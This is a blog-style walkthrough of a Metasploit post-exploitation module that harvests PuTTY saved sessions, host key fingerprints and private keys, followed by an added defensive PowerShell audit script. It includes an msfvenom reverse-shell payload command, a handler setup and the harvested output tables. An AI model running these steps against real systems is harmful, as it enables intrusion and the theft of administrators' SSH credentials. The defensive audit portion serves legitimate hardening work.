Metasploit module to enumerate PuTTY saved sessions

These days corporate environments mostly run Windows 7 workstations with the PuTTY client to reach Linux servers over SSH. For us, the "bad guys", getting hold of the credentials users employ to access those machines is essential, because either they are sysadmins who use them to manage all or a large part of the infrastructure, or they are developers who push source code or even administer specific applications.

Yes... the PuTTY CLUB exists...

Stufus has written a post-exploitation module for Metasploit that pulls *very useful* information out of PuTTY and Pageant (PuTTY's SSH-agent cousin): it enumerates the saved sessions and the trusted host key fingerprints, and it retrieves private keys. I talked a sysadmin friend who uses PuTTY into testing the module XD, so here we go...

First I generate the payload, with no need to make it FUD, because my friend is going to run it after switching off the AV first (thanks, buddy):

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.206.128 LPORT=80 -f exe > shell.exe

Then I put my ear to the door and calmly wait for someone to knock:

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.206.128
LHOST => 192.168.206.128
msf exploit(handler) > set LPORT 80
LPORT => 80
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.206.128:80 
[*] Starting the payload handler...
msf exploit(handler) > 

msf exploit(handler) > 
[*] Sending stage (885806 bytes) to 192.168.206.1
[*] Meterpreter session 1 opened (192.168.206.128:80 -> 192.168.206.1:15655) at 2015-08-26 11:22:02 -0400

Right, we have the remote shell, as you can see:
msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information                   Connection
  --  ----                   -----------                   ----------
  1   meterpreter x86/win32  DOMINIO\amigo @ PC123-21  192.168.206.128:80 -> 192.168.206.1:15655 (192.168.206.1)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

Before going on, since msfupdate doesn't pull in this module for me (yet), let's just grab it ourselves, quick and dirty:

root@kali:/# mkdir -p $HOME/.msf4/modules/post/windows/gather/
root@kali:/# curl -Lo ~/.msf4/modules/post/windows/gather/enum_putty_saved_sessions.rb https://raw.githubusercontent.com/stufus/metasploit-framework/8b8ed04a73611456cc52b809c967334d88284843/modules/post/windows/gather/enum_putty_saved_sessions.rb
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 11206  100 11206    0     0  23177      0 --:--:-- --:--:-- --:--:-- 23152

Reload:
msf exploit(handler) > reload_all 
[*] Reloading modules from all module paths...

And let's take our new module for a spin:
msf exploit(handler) > use post/windows/gather/enum_putty_saved_sessions 

msf post(enum_putty_saved_sessions) > set session -1
session => -1
msf post(enum_putty_saved_sessions) > run

[*] Looking for saved PuTTY sessions
[*] Found 14 sessions

PuTTY Saved Sessions
====================

 Name             HostName           UserName  PublicKeyFile  PortNumber  PortForwardings
 ----             --------           --------  -------------  ----------  ---------------
 checkpoint1      192.168.10.30                               22
 checkpoint2      192.168.8.30                                22
 srv23sa          192.168.15.8                                22
 srv24sa          172.40.15.8                                 22
 kali             192.168.206.128                             22
 kali2            172.20.15.203                               223
 pc2563_mad1_b1   192.168.107.19                              22
 pc2563_mad1_b2   192.168.107.18                              22
 pt121_bcn_b1     172.40.15.12                                22
 pt121_bcn_b2     192.168.15.12                               22
 kalandrid        192.168.0.30                                22
 sobera2          192.168.17.23                               22
 rojo231          192.168.0.25                                22
 srv45sa          srv45sa.local                               22

[*] PuTTY saved sessions list saved to /root/.msf4/loot/20150826114650_default_192.168.206.1_putty.sessions.c_738014.txt in CSV format & available in notes (use 'notes -t putty.savedsession' to view).
[*] Downloading private keys...

[*] Looking for previously stored SSH host key fingerprints
[*] Found 28 stored key fingerprints
[*] Downloading stored key fingerprints...

Stored SSH host key fingerprints
================================

 SSH Endpoint              Key Type(s)
 ------------              -----------
 172.40.15.8:22            rsa2
 192.168.15.8:22           rsa2
 192.168.0.25:22           rsa2
 172.16.0.1:22             rsa2
 192.168.177.128:22        rsa2
 192.168.8.30:22           rsa2
 88.26.211.211:22          rsa2
 srv45sa:22                rsa2
 192.168.142.130:22        rsa2
 192.168.107.18:22         rsa2
 192.168.10.30:22          rsa2
 192.168.0.30:22           rsa2
 192.168.107.19:22         rsa2
 192.168.15.12:22          rsa2
 172.40.15.12:22           rsa2
 192.168.17.22:22          rsa2
 192.168.242.128:22        rsa2
 192.168.242.129:22        rsa2
 192.168.0.15:22           rsa2
 83.59.38.78:22            rsa2
 83.36.133.215:22          rsa2
 81.39.79.95:22            rsa2
 172.20.15.202:22          rsa2
 172.20.15.201:22          rsa2
 172.20.15.203:22          rsa2
 192.168.1.33:22           rsa2
 192.168.17.23:22          rsa2
 192.168.206.128:22        rsa2

[*] PuTTY stored host keys list saved to /root/.msf4/loot/20150826114656_default_192.168.206.1_putty.storedfing_883782.txt in CSV format & available in notes (use 'notes -t putty.storedfingerprint' to view).

[*] Looking for Pageant...
[+] Pageant is running (Handle 0x0)
[*] Post module execution completed
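For the defender's side of this, here is an added PowerShell audit (not from the post or from stufus's module) that reads the same PuTTY data on your own workstation and additionally reports whether each referenced .ppk private key is passphrase-protected, which is the real exposure the module is after. It assumes PuTTY's registry layout under HKCU\Software\SimonTatham\PuTTY (Sessions and SshHostKeys) and the .ppk header format (second line "Encryption: none" for an unprotected key).

```powershell
# Added example, not part of the post or of the Metasploit module: audit what the
# module would harvest from this user's profile. Assumptions: PuTTY keeps sessions
# under HKCU\Software\SimonTatham\PuTTY\Sessions and host keys under ...\SshHostKeys,
# and a .ppk file's second line is "Encryption: none" when it has no passphrase.
$base = 'HKCU:\Software\SimonTatham\PuTTY'

# 1. Saved sessions: the fields the module prints, plus the state of any private key.
function Get-PuttySessionAudit {
    Get-ChildItem -Path "$base\Sessions" -ErrorAction SilentlyContinue | ForEach-Object {
        $p = Get-ItemProperty -Path $_.PSPath
        $keyState = 'none'
        if ($p.PublicKeyFile) {
            if (Test-Path -LiteralPath $p.PublicKeyFile) {
                $hdr = Get-Content -LiteralPath $p.PublicKeyFile -TotalCount 2
                $keyState = if ($hdr[1] -match '^Encryption:\s*(\S+)') {
                    if ($Matches[1] -eq 'none') { 'UNENCRYPTED ppk' } else { "encrypted ($($Matches[1]))" }
                } else { 'unrecognised key file' }
            } else { 'referenced but missing' }
        }
        [pscustomobject]@{
            Session     = [uri]::UnescapeDataString($_.PSChildName)  # PuTTY %-encodes names
            HostName    = $p.HostName
            UserName    = $p.UserName
            Port        = $p.PortNumber
            Forwardings = $p.PortForwardings
            PrivateKey  = $keyState
        }
    }
}

# 2. Stored host keys: value names are "<keytype>@<port>:<host>", which is what
#    the module reshapes into its "SSH Endpoint / Key Type(s)" table.
function Get-PuttyKnownHosts {
    $k = Get-Item -Path "$base\SshHostKeys" -ErrorAction SilentlyContinue
    if (-not $k) { return }
    foreach ($v in $k.GetValueNames()) {
        if ($v -match '^(?<type>[^@]+)@(?<port>\d+):(?<host>.+)$') {
            [pscustomobject]@{ Endpoint = "$($Matches.host):$($Matches.port)"; KeyType = $Matches.type }
        }
    }
}

Get-PuttySessionAudit | Format-Table -AutoSize
Get-PuttyKnownHosts | Group-Object Endpoint | ForEach-Object {
    [pscustomobject]@{ Endpoint = $_.Name; KeyTypes = ($_.Group.KeyType -join ',') }
} | Format-Table -AutoSize

# 3. A running Pageant means its loaded keys are usable by anything in this logon session.
if (Get-Process -Name pageant -ErrorAction SilentlyContinue) { 'Pageant is running' } else { 'Pageant not running' }
```

Any session that comes back as UNENCRYPTED ppk, and any Pageant left running on an unattended workstation, is exactly what the module above walks away with.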

Source: https://github.com/rapid7/metasploit-framework/pull/5359
